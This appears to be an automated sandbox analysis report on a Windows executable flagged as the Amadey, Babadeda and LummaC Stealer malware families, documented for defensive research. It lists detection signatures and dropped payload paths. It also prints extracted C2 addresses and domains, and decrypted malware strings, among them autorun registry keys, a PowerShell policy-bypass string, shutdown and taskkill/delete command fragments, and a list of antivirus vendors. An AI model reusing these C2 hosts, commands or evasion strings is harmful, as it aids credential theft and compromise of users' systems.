Windows Analysis Report
Af3hqfTjFh.exe

Overview

General Information

Sample name: Af3hqfTjFh.exe
renamed because original name is a hash value
Original sample name: f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b.exe
Analysis ID: 1650509
MD5: 5ec95a42b16d80c72d17cc6d0bac58de
SHA1: 9cfd9221606e1acfef1ea5f6f4bf88080822d5db
SHA256: f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b
Tags: exety-ap-4t-comuser-JAMESWT_MHT
Infos:

Detection

Amadey, Babadeda, LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected Babadeda
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected obfuscated html page
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to start a terminal service
Creates HTA files
Found API chain indicative of sandbox detection
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: HackTool - CACTUSTORCH Remote Thread Creation
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Recursive Takeown
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Babadeda According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Af3hqfTjFh.exe Avira: detected
Antivirus detection for URL or domain
Source: smeltingt.run/giiaus Avira URL Cloud: Label: malware
Source: weldorae.digital/geds Avira URL Cloud: Label: malware
Source: https://scenarisacri.top/gHSAYuqo& Avira URL Cloud: Label: malware
Source: ferromny.digital/gwpd Avira URL Cloud: Label: malware
Source: scenarisacri.top/gHSAYuqo Avira URL Cloud: Label: malware
Source: https://scenarisacri.top/gHSAYuqo Avira URL Cloud: Label: malware
Source: https://scenarisacri.top/ Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\7b35p_003[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe Avira: detection malicious, Label: TR/Injector.wtmyi
Source: C:\Users\user\AppData\Local\Temp\10352690101\7b35p_003.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\gron12321[1].exe Avira: detection malicious, Label: TR/Injector.wwtnv
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\amnew[1].exe Avira: detection malicious, Label: TR/Redcap.zvzjx
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe Avira: detection malicious, Label: TR/Redcap.zvzjx
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\v7942[1].exe Avira: detection malicious, Label: TR/Injector.wtmyi
Source: C:\Users\user\AppData\Local\Temp\10001960101\gron12321.exe Avira: detection malicious, Label: TR/Injector.wwtnv
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\alex1dskfmdsf[1].exe Avira: detection malicious, Label: TR/Injector.vsfqf
Source: C:\Users\user\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe Avira: detection malicious, Label: TR/Injector.vsfqf
Found malware configuration
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Source: 24.2.MSBuild.exe.400000.0.raw.unpack Malware Configuration Extractor: LummaC {"C2 url": ["scenarisacri.top/gHSAYuqo", "oreheatq.live/gsopp", "castmaxw.run/ganzde", "weldorae.digital/geds", "steelixr.live/aguiz", "advennture.top/GKsiio", "targett.top/dsANGt", "smeltingt.run/giiaus", "ferromny.digital/gwpd"], "Build id": "ec5997459091fca87149615faef0cf4d"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\alex1dskfmdsf[1].exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\gron12321[1].exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\apple[1].exe ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\crypted.54[1].exe ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\EPTwCQd[1].exe ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\v7942[1].exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\7b35p_003[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\amnew[1].exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\please18[1] ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\10001960101\gron12321.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\10041590101\crypted.exe ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\10041600101\please18.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\10352680101\d6a397c01b.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\10352690101\7b35p_003.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\10352700101\EPTwCQd.exe ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\22.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\ssisd.sys ReversingLabs: Detection: 62%
Multi AV Scanner detection for submitted file
Source: Af3hqfTjFh.exe Virustotal: Detection: 49% Perma Link
Source: Af3hqfTjFh.exe ReversingLabs: Detection: 52%
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Neural Call Log Analysis: 99.8%
Sample uses string decryption to hide its real strings
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: 176.113.115.6
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: /Ni9kiput/index.php
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: S-%lu-
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: bb556cff4a
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: rapes.exe
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Startup
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: cmd /C RMDIR /s/q
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: rundll32
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Programs
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: %USERPROFILE%
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: cred.dll|clip.dll|
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: cred.dll
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: clip.dll
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: http://
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: https://
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: /quiet
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: /Plugins/
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: &unit=
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: shell32.dll
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: kernel32.dll
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: GetNativeSystemInfo
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: ProgramData\
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: AVAST Software
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Kaspersky Lab
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Panda Security
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Doctor Web
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: 360TotalSecurity
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Bitdefender
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Norton
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Sophos
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Comodo
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: WinDefender
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: 0123456789
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: ------
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: ?scr=1
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: ComputerName
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: -unicode-
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: VideoID
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: DefaultSettings.XResolution
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: DefaultSettings.YResolution
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: ProductName
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: CurrentBuild
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: rundll32.exe
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: "taskkill /f /im "
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: " && timeout 1 && del
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: && Exit"
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: " && ren
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Powershell.exe
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: -executionpolicy remotesigned -File "
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: shutdown -s -t 0
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: random
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: Keyboard Layout\Preload
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: 00000419
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: 00000422
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: 00000423
Source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp String decryptor: 0000043f
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: scenarisacri.top/gHSAYuqo
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: oreheatq.live/gsopp
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: castmaxw.run/ganzde
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: weldorae.digital/geds
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: steelixr.live/aguiz
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: advennture.top/GKsiio
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: targett.top/dsANGt
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: smeltingt.run/giiaus
Source: 24.2.MSBuild.exe.400000.0.raw.unpack String decryptor: ferromny.digital/gwpd
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041C62B CryptUnprotectData, 24_2_0041C62B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041B6A6 CryptUnprotectData, 24_2_0041B6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041CA27 CryptUnprotectData, 24_2_0041CA27

Phishing
barindex
Yara detected obfuscated html page
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta, type: DROPPED

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\22.exe Unpacked PE file: 29.2.22.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\22.exe Unpacked PE file: 32.2.22.exe.400000.0.unpack
Uses 32bit PE files
Source: Af3hqfTjFh.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: apple.exe, 0000001C.00000003.1556143577.00000000061DA000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000001C.00000000.1553491361.0000000000433000.00000002.00000001.01000000.00000015.sdmp, apple.exe, 0000001C.00000003.1556649104.00000000061E4000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000001C.00000002.1561139167.0000000000433000.00000002.00000001.01000000.00000015.sdmp
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00E4DBBE
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E1C2A2 FindFirstFileExW, 0_2_00E1C2A2
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E568EE FindFirstFileW,FindClose, 0_2_00E568EE
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E5698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00E5698F
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E4D076
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E4D3A9
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E59B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00E59B2B
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F4F2F4 FindFirstFileExW, 22_2_00007FF748F4F2F4
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F4F478 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 22_2_00007FF748F4F478
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879F2F4 FindFirstFileExW, 25_2_00007FF73879F2F4
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879F478 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 25_2_00007FF73879F478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx] 24_2_00447100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx-11282DC2h] 24_2_00447100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch] 24_2_00447100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx-35D72F2Eh] 24_2_004101D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000584h] 24_2_0041C2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp word ptr [edi+ebx], 0000h 24_2_0044B370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [esp], edx 24_2_00443390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ch] 24_2_0042F410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax+04h] 24_2_0044B4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx edx, word ptr [eax] 24_2_0041054A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, word ptr [eax] 24_2_0041054A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ebx, byte ptr [esp+edi+0AF2709Ah] 24_2_0044C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax+1Ch] 24_2_004205B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h 24_2_004205B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then jmp eax 24_2_004496F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+28A0A914h] 24_2_0044891F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [eax], cx 24_2_004109E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov word ptr [ecx], dx 24_2_00411D51
